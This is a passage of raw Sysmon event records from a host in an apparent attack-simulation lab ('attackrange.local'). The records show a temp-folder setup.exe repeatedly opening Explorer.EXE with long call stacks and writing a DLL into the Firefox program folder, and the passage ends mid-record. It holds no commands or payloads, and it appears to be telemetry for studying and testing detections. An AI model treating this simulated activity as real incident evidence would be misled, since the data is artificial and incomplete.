13:59:52.427{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000015089Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.427{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64) 10341000x800000000000000015088Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.427{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015087Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.427{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015086Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.427{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000015085Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.427{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64) 10341000x800000000000000015084Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.427{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000015083Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.427{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000015082Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.427{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64) 10341000x800000000000000015081Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.427{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 11241100x800000000000000015080Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:59:52.427{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exeC:\Program Files\Mozilla Firefox\mozavutil.dll2021-01-18 13:59:52.427 10341000x800000000000000015079Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.427{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015078Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.427{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015077Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.427{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015076Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.427{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000015075Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.411{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015074Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.411{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015073Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.411{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3 10341000x800000000000000015072Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.411{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.